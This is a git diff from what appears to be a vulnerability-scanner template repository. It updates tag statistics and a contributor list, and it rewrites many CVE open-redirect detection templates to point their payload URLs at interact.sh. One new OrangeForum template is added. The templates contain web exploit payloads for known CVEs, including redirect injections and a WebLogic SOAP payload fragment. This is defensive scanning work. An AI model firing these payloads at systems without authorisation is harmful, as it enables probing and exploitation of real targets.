-| rsyncd | 1 | | | | | | | | | -| satellian | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| primefaces | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| scalar | 1 | | | | | | | | | -| goip | 1 | | | | | | | | | -| debounce | 1 | | | | | | | | | -| gofile | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| caa | 1 | | | | | | | | | -| aniapi | 1 | | | | | | | | | -| opengear | 1 | | | | | | | | | -| roads | 1 | | | | | | | | | -| seopanel | 1 | | | | | | | | | +| librenms | 1 | | | | | | | | | +| racksnet | 1 | | | | | | | | | +| h3c | 1 | | | | | | | | | +| faust | 1 | | | | | | | | | +| stackstorm | 1 | | | | | | | | | +| virustotal | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| zentral | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| superset | 1 | | | | | | | | | +| lionwiki | 1 | | | | | | | | | +| tufin | 1 | | | | | | | | | +| mi | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| jupyterhub | 1 | | | | | | | | | +| atvise | 1 | | | | | | | | | +| books | 1 | | | | | | | | | +| synapse | 1 | | | | | | | | | +| quip | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| etherscan | 1 | | | | | | | | | +| barracuda | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| radius | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| argocd | 1 | | | | | | | | | +| kvm | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| qizhi | 1 | | | | | | | | | +| gateway | 1 | | | | | | | | | +| ninjaform | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| scanii | 1 | | | | | | | | | +| mapbox | 1 | | | | | | | | | +| dapp | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| portal | 1 | | | | | | | | | +| dahua | 1 | | | | | | | | | | acontent | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| nerdgraph | 1 | | | | | | | | | +| sourcecodester | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| wallix | 1 | | | | | | | | | +| adafruit | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| secnet | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| crestron | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| dribbble | 1 | | | | | | | | | +| zeppelin | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| abuseipdb | 1 | | | | | | | | | +| gemweb | 1 | | | | | | | | | +| amcrest | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| gcp | 1 | | | | | | | | | | tamronos | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | +| petfinder | 1 | | | | | | | | | +| leanix | 1 | | | | | | | | | +| open-redirect | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| hanwang | 1 | | | | | | | | | +| ddownload | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| h2 | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| lacie | 1 | | | | | | | | | +| tianqing | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| teradici | 1 | | | | | | | | | +| cooperhewitt | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| knowage | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| gsm | 1 | | | | | | | | | +| cofense | 1 | | | | | | | | | +| ncomputing | 1 | | | | | | | | | +| restler | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| monitoring | 1 | | | | | | | | | +| kramer | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| apple | 1 | | | | | | | | | +| mirasys | 1 | | | | | | | | | +| siebel | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| fcm | 1 | | | | | | | | | +| smartsheet | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| bitquery | 1 | | | | | | | | | +| thecatapi | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| pyspider | 1 | | | | | | | | | +| shadoweb | 1 | | | | | | | | | +| stytch | 1 | | | | | | | | | +| workspace | 1 | | | | | | | | | +| europeana | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| netweaver | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| eibiz | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| rwebserver | 1 | | | | | | | | | +| checkmarx | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| dss | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| opnsense | 1 | | | | | | | | | +| mongo-express | 1 | | | | | | | | | +| alquist | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| openresty | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| securityspy | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| instagram | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| secret | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| wowza | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| wdja | 1 | | | | | | | | | +| huemagic | 1 | | | | | | | | | +| ipvpn | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| webalizer | 1 | | | | | | | | | +| babel | 1 | | | | | | | | | +| lumis | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| lfw | 1 | | | | | | | | | +| xds | 1 | | | | | | | | | +| directadmin | 1 | | | | | | | | | +| microcomputers | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| avada | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| sunflower | 1 | | | | | | | | | +| slocum | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| express | 1 | | | | | | | | | +| malwarebazaar | 1 | | | | | | | | | +| launchdarkly | 1 | | | | | | | | | +| phabricator | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| calendarific | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| helpdesk | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| apcu | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| dotnetcms | 1 | | | | | | | | | +| purestorage | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| notebook | 1 | | | | | | | | | +| submitty | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| comfortel | 1 | | | | | | | | | +| sls | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| box | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| livehelperchat | 1 | | | | | | | | | +| allied | 1 | | | | | | | | | +| yopass | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| sso | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| emerson | 1 | | | | | | | | | +| spiderfoot | 1 | | | | | | | | | +| softaculous | 1 | | | | | | | | | +| jinher | 1 | | | | | | | | | +| dokuwiki | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| front | 1 | | | | | | | | | +| roundcube | 1 | | | | | | | | | +| workreap | 1 | | | | | | | | | +| xamr | 1 | | | | | | | | | +| buttercms | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| axxonsoft | 1 | | | | | | | | | +| gofile | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| web-suite | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| misconfiguration | 1 | | | | | | | | | +| cve2001 | 1 | | | | | | | | | +| block | 1 | | | | | | | | | +| ecsimagingpacs | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| google-earth | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| fontawesome | 1 | | | | | | | | | +| coinmarketcap | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| goip | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| piwigo | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| novius | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| buddy | 1 | | | | | | | | | +| hivemanager | 1 | | | | | | | | | +| pirelli | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| tracing | 1 | | | | | | | | | +| fortressaircraft | 1 | | | | | | | | | +| sponip | 1 | | | | | | | | | +| istat | 1 | | | | | | | | | +| cgit | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| opensso | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| adiscon | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| pastebin | 1 | | | | | | | | | +| dixell | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| graphiql | 1 | | | | | | | | | +| nownodes | 1 | | | | | | | | | +| adminset | 1 | | | | | | | | | +| totolink | 1 | | | | | | | | | +| revealjs | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| prismaweb | 1 | | | | | | | | | +| interactsh | 1 | | | | | | | | | +| revslider | 1 | | | | | | | | | +| osquery | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| threatq | 1 | | | | | | | | | +| cve2002 | 1 | | | | | | | | | +| yishaadmin | 1 | | | | | | | | | +| formalms | 1 | | | | | | | | | +| memory-pipes | 1 | | | | | | | | | +| feedwordpress | 1 | | | | | | | | | +| quantum | 1 | | | | | | | | | +| whmcs | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| primefaces | 1 | | | | | | | | | +| hetzner | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| oauth2 | 1 | | | | | | | | | +| securepoint | 1 | | | | | | | | | +| spotify | 1 | | | | | | | | | +| sofneta | 1 | | | | | | | | | +| caseaware | 1 | | | | | | | | | +| polarisft | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| browserless | 1 | | | | | | | | | +| h5sconsole | 1 | | | | | | | | | +| ocs-inventory | 1 | | | | | | | | | +| securenvoy | 1 | | | | | | | | | +| cliniccases | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| sast | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| festivo | 1 | | | | | | | | | +| ixbusweb | 1 | | | | | | | | | +| piluscart | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| seopanel | 1 | | | | | | | | | +| secnet-ac | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| web-dispatcher | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| chronoforums | 1 | | | | | | | | | +| mastodon | 1 | | | | | | | | | +| struts2 | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| sv3c | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| debounce | 1 | | | | | | | | | +| saml | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| pieregister | 1 | | | | | | | | | +| eyoucms | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| projector | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| mdm | 1 | | | | | | | | | +| catfishcms | 1 | | | | | | | | | +| identityguard | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| coinlayer | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| shodan | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| telecom | 1 | | | | | | | | | +| c99 | 1 | | | | | | | | | +| edgemax | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| siemens | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| iserver | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| gocron | 1 | | | | | | | | | +| kronos | 1 | | | | | | | | | +| webpconverter | 1 | | | | | | | | | +| securitytrails | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| fms | 1 | | | | | | | | | +| tarantella | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| fullhunt | 1 | | | | | | | | | +| improvmx | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| adoptapet | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| richfaces | 1 | | | | | | | | | +| csa | 1 | | | | | | | | | +| domino | 1 | | | | | | | | | +| jwt | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| edgeos | 1 | | | | | | | | | +| gpon | 1 | | | | | | | | | +| netbeans | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| zoneminder | 1 | | | | | | | | | +| emlog | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 986f803d11..d13bed8d4c 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1191 | daffainfo | 565 | cves | 1196 | info | 1220 | http | 3263 | -| panel | 524 | dhiyaneshdk | 424 | exposed-panels | 533 | high | 895 | file | 68 | -| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 681 | network | 50 | -| xss | 379 | pdteam | 266 | technologies | 258 | critical | 421 | dns | 17 | -| wordpress | 375 | geeknik | 181 | exposures | 205 | low | 186 | | | -| rce | 302 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | -| exposure | 298 | princechaddha | 139 | workflows | 187 | | | | | -| cve2021 | 291 | 0x_akoko | 139 | token-spray | 169 | | | | | -| wp-plugin | 274 | gy741 | 122 | default-logins | 96 | | | | | -| tech | 274 | pussycat0x | 116 | file | 68 | | | | | +| cve | 1195 | daffainfo | 565 | cves | 1200 | info | 1230 | http | 3269 | +| panel | 525 | dhiyaneshdk | 424 | exposed-panels | 535 | high | 899 | file | 76 | +| lfi | 467 | pikpikcu | 316 | vulnerabilities | 458 | medium | 687 | network | 50 | +| xss | 382 | pdteam | 268 | technologies | 258 | critical | 415 | dns | 17 | +| wordpress | 376 | geeknik | 181 | exposures | 205 | low | 186 | | | +| rce | 304 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | | +| exposure | 298 | 0x_akoko | 139 | workflows | 187 | | | | | +| cve2021 | 294 | princechaddha | 139 | token-spray | 169 | | | | | +| wp-plugin | 275 | pussycat0x | 124 | default-logins | 96 | | | | | +| tech | 274 | gy741 | 122 | file | 76 | | | | | diff --git a/contributors.json b/contributors.json index 57dfa18e1b..903da709ee 100644 --- a/contributors.json +++ b/contributors.json @@ -9,6 +9,16 @@ "email": "" } }, + { + "author": "Dhiyaneshwaran", + "links": { + "github": "https://github.com/DhiyaneshGeek", + "twitter": "https://twitter.com/DhiyaneshDK", + "linkedin": "https://www.linkedin.com/in/dhiyaneshwaran-b-27947a131/", + "website": "https://dhiyaneshgeek.github.io/", + "email": "" + } + }, { "author": "duty_1g", "links": { @@ -1349,4 +1359,4 @@ "email": "" } } -] \ No newline at end of file +] diff --git a/cves/2009/CVE-2009-5020.yaml b/cves/2009/CVE-2009-5020.yaml index 53060c8ed3..c4f1e581a5 100644 --- a/cves/2009/CVE-2009-5020.yaml +++ b/cves/2009/CVE-2009-5020.yaml @@ -19,13 +19,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/awstats/awredir.pl?url=example.com' - - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com' + - '{{BaseURL}}/awstats/awredir.pl?url=interact.sh' + - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh' stop-at-first-match: true matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 # Enhanced by mp on 2022/02/13 diff --git a/cves/2013/CVE-2013-2248.yaml b/cves/2013/CVE-2013-2248.yaml index bb7040e1d4..88d17c92a9 100644 --- a/cves/2013/CVE-2013-2248.yaml +++ b/cves/2013/CVE-2013-2248.yaml @@ -18,12 +18,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.action?redirect:http://www.example.com/" + - "{{BaseURL}}/index.action?redirect:http://www.interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header # Enhanced by mp on 2022/02/21 diff --git a/cves/2014/CVE-2014-9617.yaml b/cves/2014/CVE-2014-9617.yaml index 27037cadac..a50ed20d70 100644 --- a/cves/2014/CVE-2014-9617.yaml +++ b/cves/2014/CVE-2014-9617.yaml @@ -19,12 +19,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/" + - "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' # Enhanced by mp on 2022/02/25 diff --git a/cves/2015/CVE-2015-5354.yaml b/cves/2015/CVE-2015-5354.yaml index 9ab1da69ac..42b45db3e3 100644 --- a/cves/2015/CVE-2015-5354.yaml +++ b/cves/2015/CVE-2015-5354.yaml @@ -20,10 +20,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://example.com' + - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2015/CVE-2015-5461.yaml b/cves/2015/CVE-2015-5461.yaml index 37fe790d57..70deccfb6e 100644 --- a/cves/2015/CVE-2015-5461.yaml +++ b/cves/2015/CVE-2015-5461.yaml @@ -17,10 +17,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com" + - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/cves/2015/CVE-2015-7823.yaml b/cves/2015/CVE-2015-7823.yaml index 78174bdbb0..1f595d4edf 100644 --- a/cves/2015/CVE-2015-7823.yaml +++ b/cves/2015/CVE-2015-7823.yaml @@ -16,10 +16,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://example.com/" + - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/cves/2016/CVE-2016-3978.yaml b/cves/2016/CVE-2016-3978.yaml index 601462cf16..31ea2c13be 100644 --- a/cves/2016/CVE-2016-3978.yaml +++ b/cves/2016/CVE-2016-3978.yaml @@ -20,10 +20,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/login?redir=http://www.example.com' + - '{{BaseURL}}/login?redir=http://www.interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 760d49e6a1..8ac82d2d67 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -42,7 +42,7 @@ requests: -c - example.com + interact.sh diff --git a/cves/2017/CVE-2017-12138.yaml b/cves/2017/CVE-2017-12138.yaml index f8205c321b..2931b0c317 100644 --- a/cves/2017/CVE-2017-12138.yaml +++ b/cves/2017/CVE-2017-12138.yaml @@ -26,7 +26,7 @@ requests: uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login - | - GET /modules/profile/index.php?op=main&xoops_redirect=https:www.attacker.com HTTP/1.1 + GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1 Host: {{Hostname}} cookie-reuse: true @@ -34,4 +34,4 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml index b0ea8cdf0b..8b9c4aefb0 100644 --- a/cves/2017/CVE-2017-3528.yaml +++ b/cves/2017/CVE-2017-3528.yaml @@ -20,12 +20,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com" + - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh" matchers: - type: word words: - - 'noresize src="/\example.com?configName=' + - 'noresize src="/\interact.sh?configName=' part: body # Enhanced by mp on 2022/04/14 diff --git a/cves/2018/CVE-2018-11784.yaml b/cves/2018/CVE-2018-11784.yaml index 371917e082..89b12d36fe 100644 --- a/cves/2018/CVE-2018-11784.yaml +++ b/cves/2018/CVE-2018-11784.yaml @@ -19,12 +19,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}//example.com" + - "{{BaseURL}}//interact.sh" matchers: - type: regex regex: - - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com" + - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?interact.sh" part: header # Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-12300.yaml b/cves/2018/CVE-2018-12300.yaml index c1d638cc99..300570d436 100644 --- a/cves/2018/CVE-2018-12300.yaml +++ b/cves/2018/CVE-2018-12300.yaml @@ -19,10 +19,10 @@ requests: - method: GET path: - - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#' + - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2018/CVE-2018-12675.yaml b/cves/2018/CVE-2018-12675.yaml index 2a10a92033..b2311e0466 100644 --- a/cves/2018/CVE-2018-12675.yaml +++ b/cves/2018/CVE-2018-12675.yaml @@ -23,10 +23,10 @@ info: requests: - method: GET path: - - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fattacker.com' + - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh' matchers: - type: word part: body words: - - '' + - '' diff --git a/cves/2018/CVE-2018-14474.yaml b/cves/2018/CVE-2018-14474.yaml new file mode 100644 index 0000000000..a120704c60 --- /dev/null +++ b/cves/2018/CVE-2018-14474.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-14474 + +info: + name: OrangeForum 1.4.0 - Open Redirect + author: 0x_Akoko + severity: medium + description: | + views/auth.go in Orange Forum 1.4.0 allows Open Redirection via the next parameter to /login or /signup. + reference: + - https://github.com/s-gv/orangeforum/commit/1f6313cb3a1e755880fc1354f3e1efc4dd2dd4aa + - https://seclists.org/fulldisclosure/2019/Jan/32 + - https://vuldb.com/?id.122045 + - https://nvd.nist.gov/vuln/detail/CVE-2018-14474 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-14474 + cwe-id: CWE-601 + tags: cve,cve2018,redirect,orangeforum,oss + +requests: + - method: GET + path: + - '{{BaseURL}}/login?next=http://interact.sh/?app.scan/' + - '{{BaseURL}}/signup?next=http://interact.sh/?app.scan/' + + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2018/CVE-2018-14574.yaml b/cves/2018/CVE-2018-14574.yaml index 1ae3602c19..0a5fad2968 100644 --- a/cves/2018/CVE-2018-14574.yaml +++ b/cves/2018/CVE-2018-14574.yaml @@ -22,7 +22,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}//www.example.com" + - "{{BaseURL}}//www.interact.sh" matchers-condition: and matchers: @@ -31,6 +31,6 @@ requests: - 301 - type: word words: - - "Location: https://www.example.com" - - "Location: http://www.example.com" + - "Location: https://www.interact.sh" + - "Location: http://www.interact.sh" part: header diff --git a/cves/2018/CVE-2018-14931.yaml b/cves/2018/CVE-2018-14931.yaml index babdd309c5..884a14b46c 100644 --- a/cves/2018/CVE-2018-14931.yaml +++ b/cves/2018/CVE-2018-14931.yaml @@ -19,12 +19,12 @@ requests: - method: GET path: - - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.example.com' + - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh' matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - 